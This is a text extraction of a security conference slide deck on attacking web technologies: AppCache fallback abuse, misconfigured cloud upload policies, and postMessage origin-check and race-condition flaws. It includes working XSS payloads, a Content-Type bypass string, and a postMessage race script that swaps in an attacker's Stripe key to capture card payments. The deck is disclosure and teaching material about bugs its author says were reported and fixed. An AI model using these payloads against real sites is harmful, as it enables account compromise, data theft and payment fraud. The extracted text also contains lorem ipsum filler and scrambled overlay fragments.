Scribd
Upload
31 views142 pages

Appsec Modern

The document discusses attacking modern web technologies. It begins with an introduction of the speaker, Frans Rosén, who is a security advisor and hacker. It then outlines topics to be covered: AppCache bugs in all browsers, weak upload policy implementations that can be bypassed, and exploiting vulnerabilities in postMessage implementations through tools and abusing sandboxed domains.

Uploaded by

Abdullahi Nasir
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
31 views142 pages

Appsec Modern

The document discusses attacking modern web technologies. It begins with an introduction of the speaker, Frans Rosén, who is a security advisor and hacker. It then outlines topics to be covered: AppCache bugs in all browsers, weak upload policy implementations that can be bypassed, and exploiting vulnerabilities in postMessage implementations through tools and abusing sandboxed domains.

Uploaded by

Abdullahi Nasir
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 142

Attacking Modern Web

Technologies
Frans Rosén @fransrosen
Attacking "Modern" Web
Technologies
Frans Rosén @fransrosen
Modern = stuff people use

Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque
laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto
beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur
aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi
nesciunt.
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Frans Rosén
• "The Swedish Ninja"
• Security Advisor @detectify ( twitter: @fransrosen )
• HackerOne #7 @ /leaderboard/all-time
• Blog at labs.detectify.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Frans Rosén
• Winner of MVH at H1-702 Live Hacking in Vegas!
• Winner Team Sweden in San Francisco (Oath)
• Best bug at H1-202 in Washington (Mapbox)
• Best bug at H1-3120 in Amsterdam (Dropbox)
Attacking Modern Web Technologies
Frans Rosén @fransrosen

Rundown
AppCache
• Bug in all browsers
Upload Policies
• Weak Implementations
• Bypassing business logic
Deep dive in postMessage implementations
• The postMessage-tracker extension
• Abusing sandboxed domains
• Leaks, extraction, client-side race conditions
Attacking Modern Web Technologies
Frans Rosén @fransrosen

Rundown
AppCache
• Bug in all browsers
Upload Policies
• Weak Implementations
• Bypassing business logic
Deep dive in postMessage implementations
• The postMessage-tracker extension Tool share!
• Abusing sandboxed domains
• Leaks, extraction, client-side race conditions
AppCache – Not modern!

Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque
laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto
beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur
aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi
nesciunt.
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Disclaimer
Found independently by
@filedescriptor
Announced last AppSecEU

https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=22
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

AppCache
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

AppCache
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

AppCache
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Cookie Stuffing/Bombing

Will make EVERY page return 500 Error = Manifest FALLBACK will be used
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Bug in every browser


Manifest placed in /u/2241902/manifest.txt

Would use the FALLBACK for EVERYTHING, even outside the dir
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Surprise – Specification was vague


"To mitigate this, manifests can only specify
fallbacks that are in the same path as the
manifest itself."

https://www.w3.org/TR/2015/WD-html51-20150506/browsers.html#concept-appcache-manifest-fallback
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Surprise – Specification was vague


"To mitigate this, manifests can only specify
fallbacks that are in the same path as the
manifest itself."
This was confusing, could mean the path to the fallback-
URL and that was what browsers thought. They missed:
"Fallback namespaces must also be in the same path as the manifest's URL."

https://www.w3.org/TR/2015/WD-html51-20150506/browsers.html#concept-appcache-manifest-fallback
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

AppCache demo
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

AppCache on Dropbox
• Could run XML on dl.dropboxusercontent.com as HTML
• XML installs manifest in browser on root
• Any file downloaded from Dropbox would use the
fallback XML-HTML page, which would log the current
URL to an external logging site

• Every secret link would be leaked to the attacker


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

AppCache on Dropbox
• Could run XML on dl.dropboxusercontent.com as HTML
• XML installs manifest in browser on root
4 5
• Any file downloaded from Dropbox would use the 2,8
fallback XML-HTML page, which would log the : $1
current
ty
URL to an external logging site un
Bo
• Every secret link would be leaked to the attacker
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Dropbox mitigations
• No more XML-HTML on dl.dropboxusercontent.com
• No more public directory for Dropbox users
• Coordinated bug reporting to every browser
• No more FALLBACK on root from path file
• Argumented for faster deprecation of AppCache
• Random subdomains for user-files
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Dropbox mitigations
• No more XML-HTML on dl.dropboxusercontent.com
• No more public directory for Dropbox users
• Coordinated bug reporting to every browser
• No more FALLBACK on root from path file
• Argumented for faster deprecation of AppCache
• Random subdomains for user-files
Chrome Fixed Edge/IE Fixed
Reported 28 Feb 2017, fixed ~June 2017
Firefox Fixed Safari Fixed
https://bugs.chromium.org/p/chromium/issues/detail?id=696806#c40
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Dropbox mitigations
• No more XML-HTML on dl.dropboxusercontent.com
• No more public directory for Dropbox users
000
• Coordinated bug reporting to every browser
: $3
• No more FALLBACK on root from path file
e s
Argumented for faster deprecation of AppCachenti

ou
• Random subdomains for user-files br
se
Chrome Fixed Edge/IE
ow
Fixed
r
Firefox Fixed Safari B
Fixed
Reported 28 Feb 2017, fixed ~June 2017

https://bugs.chromium.org/p/chromium/issues/detail?id=696806#c40
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

AppCache vulns still possible


Requirements:
• HTTPS only (was changed recently)
• Files uploaded can run HTML
• Files could be on a isolated sandboxed domain
• Files are uploaded to the same directory for all users
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

ServiceWorkers, big brother of AppCache


Requirements:
• HTTPS only
• Files uploaded can run HTML
• Files could be on a isolated sandboxed domain
• Files are uploaded to the root path
For example: bucket123.s3.amazonaws.com/test.html
Upload Policies
AWS and Google Cloud
Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque
laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto
beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur
aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi
nesciunt.
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Upload Policies
A way to upload files directly to a bucket, without
passing the company’s server first.

" Faster upload


" Secure (signed policy)
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Upload Policies
A way to upload files directly to a bucket, without
passing the company’s server first.

" Faster upload


" Secure (signed policy)
" Easy to do wrong!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Upload Policies
Looks like this:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Upload Policies
Policy is a signed base64 encoded JSON
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Pitfalls AWS S3
" starts-with $key does not contain anything

We can replace any file in the bucket!


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Pitfalls AWS S3
" starts-with $key does not contain anything

We can replace any file in the bucket!

" starts-with $key does not contain path-separator

We can place stuff in root,


remember ServiceWorkers/AppCache?
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Pitfalls AWS S3
" $Content-Type uses empty starts-with + content-disp

We can now upload HTML-files:


Content-type: text/html
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Pitfalls AWS S3
" $Content-Type uses empty starts-with + content-disp

We can now upload HTML-files:


Content-type: text/html
" $Content-Type uses starts-with = image/jpeg

We can still upload HTML:


Content-type: image/jpegz;text/html
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Custom business logic (Google Cloud)


POST /user_uploads/signed_url/ HTTP/1.1
Host: example.com
Content-Type: application/json;charset=UTF-8

{"file_name":"images/test.png","content_type":"image/png"}
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Custom business logic (Google Cloud)


POST /user_uploads/signed_url/ HTTP/1.1
Host: example.com
Content-Type: application/json;charset=UTF-8

{"file_name":"images/test.png","content_type":"image/png"}

Signed URL back to upload to:


{"signed_url":"https://storage.googleapis.com/uploads/images/test.png?
Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&
Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."}
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Vulnerabilities
" We can select what file to override
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Vulnerabilities
" We can select what file to override
" If signed URL allows viewing = read any file
POST /user_uploads/signed_url/ HTTP/1.1
Host: example.com
Content-Type: application/json;charset=UTF-8

{"file_name":"documents/invoice1.pdf","content_type":"application/pdf"}

{"signed_url":"https://storage.googleapis.com/uploads/documents/invoice1.pdf?
Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&
Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."}

Just fetch the URL and we have the invoice


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Vulnerabilities
" We can select what file to override
" If signed URL allows viewing = read any file
POST /user_uploads/signed_url/ HTTP/1.1
000
Host: example.com
15,
$
Content-Type: application/json;charset=UTF-8

s: ~
e
{"file_name":"documents/invoice1.pdf","content_type":"application/pdf"}

nti
u
{"signed_url":"https://storage.googleapis.com/uploads/documents/invoice1.pdf?

bo
Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&

l
Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."}
a
Tot
Just fetch the URL and we have the invoice
Rolling your own
policy logic sucks
Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque
laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto
beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur
aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi
nesciunt.
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Custom Policy Logic


Goal is to reach the bucket-root, or another file
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Path traversal with path normalization


Back to the 90s!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Path traversal with path normalization


Back to the 90s!

Full read access to every object + listing


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Regex extraction of URL-parts


Expected:
https://example-bucket.s3.amazonaws.com/dir/file.png

Result:
https://s3.amazonaws.com/example-bucket/dir/file.png?Signature..
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Regex extraction of URL-parts


Bypass:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Regex extraction of URL-parts


Bypass:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Regex extraction of URL-parts


Bypass:

Full read access to every object + listing


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Temporary URLs with signed links


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Temporary URLs with signed links


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Temporary URLs with signed links

https://secure.example.com/files/xx11
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Temporary URLs with signed links

https://secure.example.com/files/xx11
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Temporary URLs with signed links


e c t
obj
ve ry
to e
e s s
a cc
ea d
ll r
https://secure.example.com/files/xx11
Fu
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Full access to every object


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Full access to every object


Deep dive in postMessage

Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque
laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto
beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur
aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi
nesciunt.
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Birth of the postMessage-tracker extension


• 1 year ago, discussion on last AppSecEU!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Birth of the postMessage-tracker extension


• Catch every listener in all frames.
• Find the function receiving the message
• Log all messages btw all frames
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Birth of the postMessage-tracker extension


• Catch every listener in all frames.
• Find the function receiving the message
• Log all messages btw all frames
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

What have I found?


Regular vuln cases (XSS)
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

What have I found?


Regular vuln cases (XSS)
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

What have I found?


Regular vuln cases (XSS)
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

What have I found?


Regular vuln cases (XSS)
if (e.data.JSloadScript) {
if (e.data.JSloadScript.type == "iframe") {
// create the new iframe element with the src given to us via the event
local_create_element(doc, ['iframe', 'width', '0', 'height', '0', 'src',
e.data.JSloadScript.value], parent);
} else {
localLoadScript(e.data.JSloadScript.value)
}
}
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

What have I found?


Regular vuln cases (XSS)
if (e.data.JSloadScript) {
if (e.data.JSloadScript.type == "iframe") {
// create the new iframe element with the src given to us via the event
local_create_element(doc, ['iframe', 'width', '0', 'height', '0', 'src',
e.data.JSloadScript.value], parent);
} else {
localLoadScript(e.data.JSloadScript.value)
}
}

b.postMessage({"JSloadScript":{"value":"data:text/javascript,alert(document.domain)"}},'*')
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

What have I found?


Complex ones: Data-Extraction
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
Listener:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
Vulnerable origin-check:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
Vulnerable origin-check:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
Looks harmless?
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
Initiating ruleset
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
Action-Rules:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
Extraction-options!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
{
Trigger: "params": {
"testRules": {
"rules": [
{
"name": "xxx",
"triggers": {
"type": "Delay",
"delay": 5000
}
...
}
]
}
}
}
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
State:
...
"states": {
"type": "JSVariableExists",
"name": "ClickTaleCookieDomain",
"value": "example.com"
},
...
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
...
Action: "action": {
"actualType": "CTEventAction",
"type": "TestRuleEvent",
"dynamicEventName": {
"parts": [
{
"type": "ElementValue",
"ctSelector": {
"querySelector": ".content-wrapper script"
}
},
{
"type": "CookieValue",
"name": "csrf_token"
}
]
}
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
Payload:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Data-Extraction
CSRF-token!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

XSS on isolated but "trusted" domain


Sandboxed domain being trusted and not trusted at the same time.
postMessage used to transfer data from/to trusted domain.
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Document service

ACME.COM
Create new doc
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

XSS on sandbox

usersandbox.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

User creates a document

usersandbox.com
ACME.COM
Create new doc
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Sandbox opens up in iframe for doc-converter

usersandbox.com
ACME.COM
Create new doc

usersandbox.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Hijack the iframe js, due to SOP

usersandbox.com
ACME.COM
Create new doc

usersandbox.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

User uploads file, postMessage data to converter

usersandbox.com ACME.COM

usersandbox.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Iframe leaks data to attacker’s sandbox window

usersandbox.com ACME.COM

usersandbox.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

And we have the document-data!


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

What have I found?


Client-side Race Conditions!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Localized welcome screen, JS loaded w/ postMsg

Loading…
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Localized welcome screen, JS loaded w/ postMsg

Welcome!

Välkommen!
mpel.com
localeservice.com
Willkommen!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Localized welcome screen, JS loaded w/ postMsg

Welcome!

Välkommen!
link.com.example.com = OK
localeservice.com
Willkommen!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Only works once

Welcome!

Välkommen!
localeservice.com
Willkommen!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Only works once

Welcome!

Välkommen!
localeservice.com
Willkommen!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Curr not escaped

Welcome!

Välkommen!

Willkommen!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Loaded JS, osl vuln param


...&curr=&osl='-alert(1)-'
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

alert was blocked. yawn…


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

alert was blocked. yawn… easy fix


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Attacker-site

link.com.example.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Attacker site opens victim site

link.com.example.com
Loading…
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Loaded JS

link.com.example.com
Loading…

setInterval(function() {
if(b) b.postMessage('{"sitelist":"www.example.com/
global","siteurl":"www.example.com/uk","curr":"curr=&osl=\'-(function()
{document.body.appendChild(iframe=document.createElement(\'iframe\'));window
.alert=iframe.contentWindow[\'alert\'];document.body.removeChild(iframe);win
dow.alert(document.domain)})()-\'"}','*')
}, 10);
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Loaded JS
Loads mpel.js...
link.com.example.com
Loading…

setInterval(function() {
if(b) b.postMessage('{"sitelist":"www.example.com/
global","siteurl":"www.example.com/uk","curr":"curr=&osl=\'-(function()
{document.body.appendChild(iframe=document.createElement(\'iframe\'));window
.alert=iframe.contentWindow[\'alert\'];document.body.removeChild(iframe);win
dow.alert(document.domain)})()-\'"}','*')
}, 10);
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Loaded JS
Loads mpel.js...
link.com.example.com
Welcome!

Välkommen!
localeservice.com
Willkommen!

setInterval(function() {
if(b) b.postMessage('{"sitelist":"www.example.com/
global","siteurl":"www.example.com/uk","curr":"curr=&osl=\'-(function()
{document.body.appendChild(iframe=document.createElement(\'iframe\'));window
.alert=iframe.contentWindow[\'alert\'];document.body.removeChild(iframe);win
dow.alert(document.domain)})()-\'"}','*')
}, 10);
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

We won!
Loads mpel.js...
link.com.example.com
Welcome!

Välkommen!
localeservice.com
Willkommen!

setInterval(function() {
if(b) b.postMessage('{"sitelist":"www.example.com/
global","siteurl":"www.example.com/uk","curr":"curr=&osl=\'-(function()
{document.body.appendChild(iframe=document.createElement(\'iframe\'));window
.alert=iframe.contentWindow[\'alert\'];document.body.removeChild(iframe);win
dow.alert(document.domain)})()-\'"}','*')
}, 10);
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Client-Side Race Condition


postMessage between JS-load and iframe-load
Worked in all browsers.
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Client-Side Race Condition #2


Multiple bugs incoming, hang on!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Can you find the bug(s)?


SecureCreditCardController.prototype.isValidOrigin = function (origin) {
if (origin === null || origin === undefined) {
return false;
}
var domains = [".example.com", ".example.to", ".example.at", ".example.ca",
".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie",
".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi",
".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp",
".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph",
".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr",
".example.com.hk", ".example.com.tw"];
var escapedDomains = $.map(domains, function (domain) {
return domain.replace('.', '\\.');
});
var exampleDomainsRE = '^https:\/\/.*(' + escapedDomains.join('|') + ')$';
return Boolean(origin.match(exampleDomainsRE));
};
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

1st bug!
SecureCreditCardController.prototype.isValidOrigin = function (origin) {
if (origin === null || origin === undefined) {
return false;
}
var domains = [".example.com", ".example.to", ".example.at", ".example.ca",
".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie",
".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi",
".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp",
".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph",
".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr",
".example.com.hk", ".example.com.tw"];
var escapedDomains = $.map(domains, function (domain) {
return domain.replace('.', '\\.');
});
var exampleDomainsRE = '^https:\/\/.*(' + escapedDomains.join('|') + ')$';
return Boolean(origin.match(exampleDomainsRE));
};
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

1st bug!
".example.co.nz".replace('.', '\\.')

"\.example.co.nz"
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Can you find the next bug?


SecureCreditCardController.prototype.isValidOrigin = function (origin) {
if (origin === null || origin === undefined) {
return false;
}
var domains = [".example.com", ".example.to", ".example.at", ".example.ca",
".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie",
".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi",
".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp",
".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph",
".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr",
".example.com.hk", ".example.com.tw"];
var escapedDomains = $.map(domains, function (domain) {
return domain.replace('.', '\\.');
});
var exampleDomainsRE = '^https:\/\/.*(' + escapedDomains.join('|') + ')$';
return Boolean(origin.match(exampleDomainsRE));
};
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

2nd bug!
SecureCreditCardController.prototype.isValidOrigin = function (origin) {
if (origin === null || origin === undefined) {
return false;
}
var domains = [".example.com", ".example.to", ".example.at", ".example.ca",
".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie",
".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi",
".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp",
".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph",
".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr",
".example.com.hk", ".example.com.tw"];
var escapedDomains = $.map(domains, function (domain) {
return domain.replace('.', '\\.');
});
var exampleDomainsRE = '^https:\/\/.*(' + escapedDomains.join('|') + ')$';
return Boolean(origin.match(exampleDomainsRE));
};
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

.nz is allowed since 2015!

https://en.wikipedia.org/wiki/.nz
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

2nd bug!
Boolean("https://www.exampleaco.nz".match('^https:\/
\/.*(\.example.co.nz)$'))

true
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

2nd bug!
Boolean("https://www.exampleaco.nz".match('^https:\/
\/.*(\.example.co.nz)$'))

true
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Vulnerable scenario

ilikefood.com

Subscribe!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Opens PCI-certified domain for payment

ilikefood.com

Subscribe!

foodpayments.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Iframe loaded, main frame sends INIT to iframe

iframe.postMessage('INIT', '*')
ilikefood.com

Subscribe!

foodpayments.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Iframe registers the sender of INIT as msgTarget

iframe.postMessage('INIT', '*')
ilikefood.com

Subscribe!
if(e.data==INIT && originOK) {
foodpayments.com
msgTarget = event.source
msgTarget.postMessage('INIT','*')
}
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Iframe tells main all is OK

if(e.data==INIT and e.source==iframe) {


ilikefood.com all_ok_dont_kill_frame()
}
Subscribe!

foodpayments.com

msgTarget.postMessage('INIT','*')
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Main window sends over provider data


if(INIT) {
iframe.postMessage('["LOAD",
"stripe","pk_abc123"]}’, '*')
ilikefood.com }

Subscribe!

foodpayments.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Iframe loads payment provider and kills channel


if(INIT) {
iframe.postMessage('["LOAD",
"stripe","pk_abc123"]}’, '*')
ilikefood.com }
if(INIT) {
Subscribe! if(e.data[0]==LOAD && originOK) {
initpayment(e.data[1], e.data[2])
foodpayments.com window.removeEventListener
('message', listener)
}
}
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Did you see it?


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Open ilikefood.com from attacker

exampleaco.nz ilikefood.com
Subscribe!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Victim clicks subscribe, iframe is loaded

exampleaco.nz ilikefood.com
Subscribe!
foodpayments.com
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Attacker sprays out LOAD to iframe

exampleaco.nz ilikefood.com
Subscribe!
foodpayments.com

setInterval(function(){
child.frames[0].postMessage('["LOAD","stripe","pk_diffkey"]}’,'*')
}, 100)
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

INIT-dance resolves, but attacker wins with LOAD


'INIT'<->'INIT'
exampleaco.nz ilikefood.com
Subscribe!
foodpayments.com

setInterval(function(){
child.frames[0].postMessage('["LOAD","stripe","pk_diffkey"]}’,'*')
}, 100)
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

LOAD kills listener, we won the race! Stripe loads…

exampleaco.nz ilikefood.com
Subscribe!
foodpayments.com

Frame loads
api.stripe.com?key=pk_diffkey…
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

It’s now the attacker’s Stripe account

exampleaco.nz ilikefood.com
Subscribe!
foodpayments.com

Enter credit card

Pay!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Payment will fail for site…

foodpayments.com

Payment failed :(
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Payment will fail for site…but worked for Stripe!

foodpayments.com

Payment failed :(
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

From Stripe-logs we can charge the card anything!


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

From Stripe-logs we can charge the card anything!


Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

Client-Side Race Condition #2


postMessage from opener between two other postMessage-calls
Chrome seems to be the only one allowing this to happen afaik.
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

postMessage-tracker Speedbumps
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

postMessage-tracker Speedbumps
• Problem 1: Function-wrapping, Raven.js, rollbar, bugsnag, NewRelic
Before:
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

postMessage-tracker Speedbumps
• Problem 1: Function-wrapping, Raven.js, rollbar, bugsnag, NewRelic
Before: After:

Solution: Find wrapper and jump over it. console better due to this!
Attacking Modern Web Technologies
Author name her
Frans Rosén @fransrosen

